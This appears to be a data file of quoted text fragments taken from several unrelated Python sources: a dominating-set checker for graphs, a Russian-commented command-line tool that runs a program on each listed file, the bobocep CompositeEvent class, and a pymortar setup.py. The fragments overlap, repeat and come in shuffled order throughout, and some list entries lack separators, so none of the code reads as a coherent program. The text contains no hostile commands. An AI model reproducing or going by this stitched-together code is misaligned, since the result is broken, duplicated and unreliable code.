"(any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in",
"range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in",
"sub in L: for val in sub: Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if",
"return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i]",
"range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub",
"Flatten(L): Flat=[] for sub in L: for val in sub: Flat.append(val) return Flat",
"return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i",
"Flat.append(val) return Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1",
"GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and cell != 1):",
"return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1], [0,0,1,1,0]] S=[1,4]",
"RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV",
"IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s): if (i==-1):",
"def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return",
"NAV.remove(S[i]) return NAV def Flatten(L): Flat=[] for sub in L: for val in",
"any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True if (any_adj",
"NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)): any_adj=False for",
"Flat def IsAdjacent(A,v1,v2): if (v1==v2): return False return A[v1][v2] == 1 def GetNonAdjacents(V,NA,i,s):",
"dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for i in range(len(NAV)):",
"NAV def Flatten(L): Flat=[] for sub in L: for val in sub: Flat.append(val)",
"return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i]",
"Flat=[] for sub in L: for val in sub: Flat.append(val) return Flat def",
"!= 1): NA.append(i) i=i-1 return GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0],",
"i in range(len(S)): dominator=S[i] vertex=A[dominator] NA=GetNonAdjacents(vertex,[],len(vertex)-1,dominator) NAV.append(NA) ToCheck=RemoveS(NAV,S) return Check(A,S,ToCheck) def Check(A,S,NAV): for",
"== 1 def GetNonAdjacents(V,NA,i,s): if (i==-1): return NA cell=V[i] if (i !=s and",
"any_adj=True if (any_adj is False): return False return True def RemoveS(NAV,S): NAV=Flatten(NAV) for",
"NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV): NAV.remove(S[i]) return NAV def",
"return True def RemoveS(NAV,S): NAV=Flatten(NAV) for i in range(len(S)): if (S[i] in NAV):",
"GetNonAdjacents(V,NA,i,s) if __name__ == \"__main__\": A=[ [0,1,1,0,0], [1,0,1,1,0], [1,1,0,0,1], [0,1,0,0,1], [0,0,1,1,0]] S=[1,4] print(IsDominatingSet(A,S))",
"in range(len(NAV)): any_adj=False for j in range(len(S)): is_adj=IsAdjacent(A,S[j],NAV[i]) if (is_adj is True): any_adj=True",
"return NA cell=V[i] if (i !=s and cell != 1): NA.append(i) i=i-1 return"
"параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os import",
"if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1:",
"-- program [options] -- file [file ...]' def main() -> None: arg_parser =",
"1:] files_number = len(files) def percents(index: int) -> str: return '%3d%%' % (100",
"< 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if",
"файлов. Программа принимает в качестве аргументов путь к процессу, его параметры и список",
"(100 * (index + 1) / files_number) for index, filename in enumerate(files): print(percents(index),",
"= filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__ == '__main__': main()",
"file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True,",
"= args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files",
"= args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number = len(files) def",
"запуск указанного процесса для каждого из указанных файлов. Программа принимает в качестве аргументов",
"subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program",
"\"\"\" Рекурсивный запуск указанного процесса для каждого из указанных файлов. Программа принимает в",
"args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) -> str: return '%3d%%'",
"argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args()",
"'%3d%%' % (100 * (index + 1) / files_number) for index, filename in",
"* (index + 1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename))",
"USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file [file ...]' def",
"1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number",
"help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3:",
"[file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать",
"или все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR = '--'",
"одновременно. \"\"\" import os import subprocess import argparse SEPARATOR = '--' USAGE =",
"in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait()",
"ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os import subprocess import",
"процессу, его параметры и список файлов. Затем процесс запускается с указанными параметрами +",
"def percents(index: int) -> str: return '%3d%%' % (100 * (index + 1)",
"int) -> str: return '%3d%%' % (100 * (index + 1) / files_number)",
"index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if",
"filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait:",
"каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if",
"качестве аргументов путь к процессу, его параметры и список файлов. Затем процесс запускается",
"Затем процесс запускается с указанными параметрами + имя одного из файлов. Запуск может",
"arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index",
"const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) <",
"in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd =",
"args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv:",
"завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1)",
"[options] -- file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait',",
"SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1)",
"+ [''] files = args.argv[separator_index + 1:] files_number = len(files) def percents(index: int)",
"3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index",
"not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd",
"имя одного из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения",
"процесса или все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR =",
"последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import",
"+ имя одного из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая",
"exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number =",
"в качестве аргументов путь к процессу, его параметры и список файлов. Затем процесс",
"его параметры и список файлов. Затем процесс запускается с указанными параметрами + имя",
"завершения предыдущего процесса или все одновременно. \"\"\" import os import subprocess import argparse",
"action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv)",
"параметры и список файлов. Затем процесс запускается с указанными параметрами + имя одного",
"файлов. Затем процесс запускается с указанными параметрами + имя одного из файлов. Запуск",
"параметрами + имя одного из файлов. Запуск может производиться последовательно или параллельно, т.е.",
"с указанными параметрами + имя одного из файлов. Запуск может производиться последовательно или",
"= arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1)",
"program [options] -- file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE)",
"= argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args =",
"arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args",
"exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index <",
"args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number = len(files) def percents(index:",
"separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + ['']",
"def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого",
"files = args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) -> str:",
"enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if",
"-> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv',",
"[-h] [--wait] -- program [options] -- file [file ...]' def main() -> None:",
"os import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait]",
"(index + 1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1]",
"предыдущего процесса или все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR",
"= '%(prog)s [-h] [--wait] -- program [options] -- file [file ...]' def main()",
"+ 1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] =",
"<reponame>e2t/cli-tools \"\"\" Рекурсивный запуск указанного процесса для каждого из указанных файлов. Программа принимает",
"процесса для каждого из указанных файлов. Программа принимает в качестве аргументов путь к",
"аргументов путь к процессу, его параметры и список файлов. Затем процесс запускается с",
"список файлов. Затем процесс запускается с указанными параметрами + имя одного из файлов.",
"% (100 * (index + 1) / files_number) for index, filename in enumerate(files):",
"exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] +",
"len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index = args.argv.index(SEPARATOR)",
"или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os",
"одного из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего",
"None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+')",
"separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index +",
"все одновременно. \"\"\" import os import subprocess import argparse SEPARATOR = '--' USAGE",
"указанных файлов. Программа принимает в качестве аргументов путь к процессу, его параметры и",
"запускается с указанными параметрами + имя одного из файлов. Запуск может производиться последовательно",
"/ files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc",
"percents(index: int) -> str: return '%3d%%' % (100 * (index + 1) /",
"'%(prog)s [-h] [--wait] -- program [options] -- file [file ...]' def main() ->",
"Программа принимает в качестве аргументов путь к процессу, его параметры и список файлов.",
"каждого из указанных файлов. Программа принимает в качестве аргументов путь к процессу, его",
"Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все",
"SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file",
"указанными параметрами + имя одного из файлов. Запуск может производиться последовательно или параллельно,",
"str: return '%3d%%' % (100 * (index + 1) / files_number) for index,",
"из указанных файлов. Программа принимает в качестве аргументов путь к процессу, его параметры",
"[''] files = args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) ->",
"nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not in",
"[--wait] -- program [options] -- file [file ...]' def main() -> None: arg_parser",
"print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__",
"-- file [file ...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const',",
"return '%3d%%' % (100 * (index + 1) / files_number) for index, filename",
"cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__ == '__main__':",
"files_number = len(files) def percents(index: int) -> str: return '%3d%%' % (100 *",
"для каждого из указанных файлов. Программа принимает в качестве аргументов путь к процессу,",
"процесс запускается с указанными параметрами + имя одного из файлов. Запуск может производиться",
"for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd)",
"args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files =",
"т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\" import os import subprocess",
"os.path.basename(filename)) cmd[-1] = filename proc = subprocess.Popen(cmd) if args.wait: proc.wait() if __name__ ==",
"и список файлов. Затем процесс запускается с указанными параметрами + имя одного из",
"+ 1:] files_number = len(files) def percents(index: int) -> str: return '%3d%%' %",
"к процессу, его параметры и список файлов. Затем процесс запускается с указанными параметрами",
"main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса')",
"if separator_index < 1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index",
"Рекурсивный запуск указанного процесса для каждого из указанных файлов. Программа принимает в качестве",
"import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] --",
"файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или",
"\"\"\" import os import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s",
"= args.argv[separator_index + 1:] files_number = len(files) def percents(index: int) -> str: return",
"import os import subprocess import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h]",
"путь к процессу, его параметры и список файлов. Затем процесс запускается с указанными",
"if len(args.argv) < 3: exit(1) if SEPARATOR not in args.argv: exit(1) separator_index =",
"len(files) def percents(index: int) -> str: return '%3d%%' % (100 * (index +",
"arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR not",
"принимает в качестве аргументов путь к процессу, его параметры и список файлов. Затем",
"< 1: exit(1) cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:]",
"args.argv: exit(1) separator_index = args.argv.index(SEPARATOR) if separator_index < 1: exit(1) cmd = args.argv[:separator_index]",
"указанного процесса для каждого из указанных файлов. Программа принимает в качестве аргументов путь",
"-> str: return '%3d%%' % (100 * (index + 1) / files_number) for",
"= '--' USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file [file",
"arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения каждого процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if",
"= len(files) def percents(index: int) -> str: return '%3d%%' % (100 * (index",
"argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program [options] --",
"1) / files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename",
"из файлов. Запуск может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса",
"...]' def main() -> None: arg_parser = argparse.ArgumentParser(usage=USAGE) arg_parser.add_argument('--wait', action='store_const', const=True, help='ожидать завершения",
"files_number) for index, filename in enumerate(files): print(percents(index), os.path.basename(filename)) cmd[-1] = filename proc =",
"cmd = args.argv[:separator_index] + [''] files = args.argv[separator_index + 1:] files_number = len(files)",
"производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно. \"\"\"",
"процесса') arg_parser.add_argument('argv', nargs='+') args = arg_parser.parse_args() if len(args.argv) < 3: exit(1) if SEPARATOR",
"'--' USAGE = '%(prog)s [-h] [--wait] -- program [options] -- file [file ...]'",
"import argparse SEPARATOR = '--' USAGE = '%(prog)s [-h] [--wait] -- program [options]",
"может производиться последовательно или параллельно, т.е. ожидая завершения предыдущего процесса или все одновременно."
"data, defaults to an empty dict. :type data: Dict[str, str], optional :param event_id:",
"= \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory,",
"str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history =",
"name self.history = history def to_dict(self) -> dict: \"\"\" :return: A dict representation",
"def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] = None,",
"dict: \"\"\" :return: A dict representation of the object. \"\"\" return { self.TIMESTAMP:",
"event_id=event_id) self.name = name self.history = history def to_dict(self) -> dict: \"\"\" :return:",
"event to be generated. :type history: BoboHistory :param data: The event data, defaults",
"was first generated. :type timestamp: int :param name: The event name. :type name:",
":param name: The event name. :type name: str :param history: The history of",
"-> dict: \"\"\" :return: A dict representation of the object. \"\"\" return {",
"The event timestamp indicating when it was first generated. :type timestamp: int :param",
"None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name",
"= None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name =",
"str, history: BoboHistory, data: Dict[str, str] = None, event_id: str = None) ->",
"bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param",
":type data: Dict[str, str], optional :param event_id: The event ID, defaults to a",
"None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def to_dict(self) ->",
"from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event",
"indicating when it was first generated. :type timestamp: int :param name: The event",
"super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def to_dict(self) -> dict:",
"event timestamp indicating when it was first generated. :type timestamp: int :param name:",
"= name self.history = history def to_dict(self) -> dict: \"\"\" :return: A dict",
"\"\"\" :return: A dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp,",
"optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name:",
"dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY:",
"CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating when it was",
"generated ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\"",
"empty dict. :type data: Dict[str, str], optional :param event_id: The event ID, defaults",
"the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data,",
"\"\"\"A composite event. :param timestamp: The event timestamp indicating when it was first",
"None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def",
"-> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history def to_dict(self)",
"The event ID, defaults to a randomly generated ID. :type event_id: str, optional",
"ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def",
"The event name. :type name: str :param history: The history of events that",
"\"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str,",
"A dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name,",
"return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data, self.EVENT_ID: self.event_id }",
"<reponame>r3w0p/bobocep from typing import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory",
"BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating when",
"data: Dict[str, str], optional :param event_id: The event ID, defaults to a randomly",
":param timestamp: The event timestamp indicating when it was first generated. :type timestamp:",
"from typing import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class",
"HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str,",
"the composite event to be generated. :type history: BoboHistory :param data: The event",
"of events that caused the composite event to be generated. :type history: BoboHistory",
"\"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] =",
"name: str, history: BoboHistory, data: Dict[str, str] = None, event_id: str = None)",
"optional :param event_id: The event ID, defaults to a randomly generated ID. :type",
":param event_id: The event ID, defaults to a randomly generated ID. :type event_id:",
":type name: str :param history: The history of events that caused the composite",
"data: Dict[str, str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data,",
"history: BoboHistory :param data: The event data, defaults to an empty dict. :type",
"event data, defaults to an empty dict. :type data: Dict[str, str], optional :param",
"event name. :type name: str :param history: The history of events that caused",
"ID, defaults to a randomly generated ID. :type event_id: str, optional \"\"\" NAME",
"event ID, defaults to a randomly generated ID. :type event_id: str, optional \"\"\"",
"= None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history = history",
"__init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] = None, event_id:",
"representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(),",
"bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp",
"= \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data: Dict[str, str]",
"self.name = name self.history = history def to_dict(self) -> dict: \"\"\" :return: A",
"events that caused the composite event to be generated. :type history: BoboHistory :param",
"generated. :type timestamp: int :param name: The event name. :type name: str :param",
"timestamp: The event timestamp indicating when it was first generated. :type timestamp: int",
":return: A dict representation of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME:",
"that caused the composite event to be generated. :type history: BoboHistory :param data:",
"defaults to a randomly generated ID. :type event_id: str, optional \"\"\" NAME =",
"= history def to_dict(self) -> dict: \"\"\" :return: A dict representation of the",
":param history: The history of events that caused the composite event to be",
"NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history:",
"to an empty dict. :type data: Dict[str, str], optional :param event_id: The event",
"class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating when it",
"int :param name: The event name. :type name: str :param history: The history",
"when it was first generated. :type timestamp: int :param name: The event name.",
"of the object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA:",
"Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite",
"import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A",
":type history: BoboHistory :param data: The event data, defaults to an empty dict.",
"typing import Dict from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent):",
"name: The event name. :type name: str :param history: The history of events",
"object. \"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data, self.EVENT_ID:",
"import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp:",
"history def to_dict(self) -> dict: \"\"\" :return: A dict representation of the object.",
":type timestamp: int :param name: The event name. :type name: str :param history:",
"be generated. :type history: BoboHistory :param data: The event data, defaults to an",
"int, name: str, history: BoboHistory, data: Dict[str, str] = None, event_id: str =",
"data: The event data, defaults to an empty dict. :type data: Dict[str, str],",
"history of events that caused the composite event to be generated. :type history:",
"str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp: int,",
"import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The event timestamp indicating",
"event_id: The event ID, defaults to a randomly generated ID. :type event_id: str,",
"history: BoboHistory, data: Dict[str, str] = None, event_id: str = None) -> None:",
"composite event to be generated. :type history: BoboHistory :param data: The event data,",
"self.history = history def to_dict(self) -> dict: \"\"\" :return: A dict representation of",
"to_dict(self) -> dict: \"\"\" :return: A dict representation of the object. \"\"\" return",
"\"\"\" return { self.TIMESTAMP: self.timestamp, self.NAME: self.name, self.HISTORY: self.history.to_dict(), self.DATA: self.data, self.EVENT_ID: self.event_id",
"caused the composite event to be generated. :type history: BoboHistory :param data: The",
"data=data, event_id=event_id) self.name = name self.history = history def to_dict(self) -> dict: \"\"\"",
"\"name\" HISTORY = \"history\" def __init__(self, timestamp: int, name: str, history: BoboHistory, data:",
"name: str :param history: The history of events that caused the composite event",
"from bobocep.rules.events.bobo_event import BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event.",
"timestamp: int, name: str, history: BoboHistory, data: Dict[str, str] = None, event_id: str",
"timestamp: int :param name: The event name. :type name: str :param history: The",
"randomly generated ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY =",
"generated. :type history: BoboHistory :param data: The event data, defaults to an empty",
"Dict[str, str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id)",
":type event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self,",
":param data: The event data, defaults to an empty dict. :type data: Dict[str,",
"an empty dict. :type data: Dict[str, str], optional :param event_id: The event ID,",
"dict. :type data: Dict[str, str], optional :param event_id: The event ID, defaults to",
"name. :type name: str :param history: The history of events that caused the",
"Dict[str, str], optional :param event_id: The event ID, defaults to a randomly generated",
"event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp:",
"str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name",
"The event data, defaults to an empty dict. :type data: Dict[str, str], optional",
"str], optional :param event_id: The event ID, defaults to a randomly generated ID.",
"def to_dict(self) -> dict: \"\"\" :return: A dict representation of the object. \"\"\"",
"str :param history: The history of events that caused the composite event to",
"a randomly generated ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY",
"composite event. :param timestamp: The event timestamp indicating when it was first generated.",
"it was first generated. :type timestamp: int :param name: The event name. :type",
"defaults to an empty dict. :type data: Dict[str, str], optional :param event_id: The",
"to be generated. :type history: BoboHistory :param data: The event data, defaults to",
"BoboHistory :param data: The event data, defaults to an empty dict. :type data:",
"timestamp indicating when it was first generated. :type timestamp: int :param name: The",
"event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history",
"first generated. :type timestamp: int :param name: The event name. :type name: str",
"event. :param timestamp: The event timestamp indicating when it was first generated. :type",
"The history of events that caused the composite event to be generated. :type",
"BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The",
"to a randomly generated ID. :type event_id: str, optional \"\"\" NAME = \"name\"",
"BoboHistory, data: Dict[str, str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp,",
"history: The history of events that caused the composite event to be generated."
"print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[",
"long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python :: 3\", ], )",
"\"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3",
"version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language ::",
